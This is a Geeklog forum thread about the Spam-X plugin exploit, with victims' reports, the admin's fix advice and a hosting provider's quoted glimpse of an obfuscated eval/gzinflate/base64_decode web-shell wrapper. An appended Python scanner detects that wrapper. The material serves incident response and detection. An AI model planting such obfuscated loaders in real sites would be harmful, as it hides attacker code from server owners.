Geeklog Forums
Spam-X Exploit
Rictor
Anonymous
The file spamx/BlackList.Examine.class.php was being maliciously exploited to start up irc clients and plant other malicious php files on my server. I just upgraded from 1.4.0 to the latest version of Geeklog after deleting the malicious files, and I was wondering if this exploit was corrected in the new version or not? A quick search of Google found that the exploit is being discussed on several hacking sites.
Dirk
Site Admin
This issue was fixed with the release of Geeklog 1.4.0sr4 on June 30th, 2006.
It only affected incorrectly installed Geeklog setups. Which, as we have learned since, includes pretty much every install that was done using auto-installers such as Fantastico.
As usual, we suggest that Geeklog users subscribe to our (low traffic) geeklog-announce mailing list to be informed about new releases and security issues.
bye, Dirk
BMcDonald
Anonymous
Hi,
I just got a notice from my provider that this exploit happened on my system. I'm running 1.4.1, and I think I did do the upgrade with Fantastico.
I've read some problems with upgrading spamx. I'm running 1.1.0.
Would it make more sense to just uninstall that version and install the latest one fresh? I found a 1.3.9 version, but saw a post that said there's a 1.5.2 version. Any idea where that one is?
Thanks
radu
Anonymous
I did an upgrade and my spamx was corrupted, letting hackers send thousands of emails out. I also got penalized with $250 for one of my IPs that was blacklisted. Is Spamx safe or not? Can the site run without it?
This is the message I got from my server provider:
http://cluj-napoca.com/plugins/spamx/home.php
that is NOT a standard thing installed by Fantastico and the
entire home.php page is obfuscated php designed specifically to hide what it
does.
root@hosting [/home/master/public_html/plugins/spamx]# head home.php
<? eval
(gzinflate(base64_decode("
.....
That is not what normal code is supposed to look like.
Dirk
Site Admin
Ouch - there's an embarrassing bug in our inclusion protection for some of the Spam-X modules, so that old exploit still works. Sorry about that. We'll get that fixed ASAP.
In the meantime, please fix your installation: You should not put the plugins directory into the web root (as stated in the installation instructions). If you can't put it outside of the webroot, please follow the instructions here.
bye, Dirk
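A defender-side check for the wrapper the hosting provider quoted from home.php, added here as an example that is not part of the original thread or of Geeklog's code: it walks a directory tree and reports PHP files containing eval(gzinflate(base64_decode(. The function names, the extension list and the sample tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# eval( gzinflate( base64_decode( ... with any whitespace or line breaks between
# tokens; PHP function names are case-insensitive, so the match is too.
WRAPPER = re.compile(rb"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(", re.I)
PHP_EXT = (".php", ".phtml", ".inc")  # assumed list of PHP-handled extensions


def scan_tree(root, max_bytes=1 << 20):
    """Return sorted [(relative_path, byte_offset)] for files containing the wrapper."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXT):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(max_bytes)
            except OSError:
                continue  # unreadable file: skip here, review it by hand
            m = WRAPPER.search(data)
            if m:
                hits.append((os.path.relpath(path, root), m.start()))
    return sorted(hits)


def demo():
    """Scan a constructed tree: one ordinary file, one with the wrapper."""
    with tempfile.TemporaryDirectory() as root:
        spamx = os.path.join(root, "plugins", "spamx")
        os.makedirs(spamx)
        samples = {
            # Constructed stand-ins, not real Geeklog files or a real payload.
            "functions.inc": b"<?php\nfunction plugin_demo() { return 1; }\n",
            "home.php": b'<? eval\n(gzinflate(base64_decode("QUJD")));\n',
            "notes.txt": b"eval(gzinflate(base64_decode( mentioned in docs",
        }
        for name, body in samples.items():
            with open(os.path.join(spamx, name), "wb") as fh:
                fh.write(body)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, off in demo():
        print(f"{rel}: obfuscation wrapper at byte {off}")
```

An empty result only means this one wrapper was not found; comparing the plugin files against a fresh copy of the release archive also catches planted files that use other encodings.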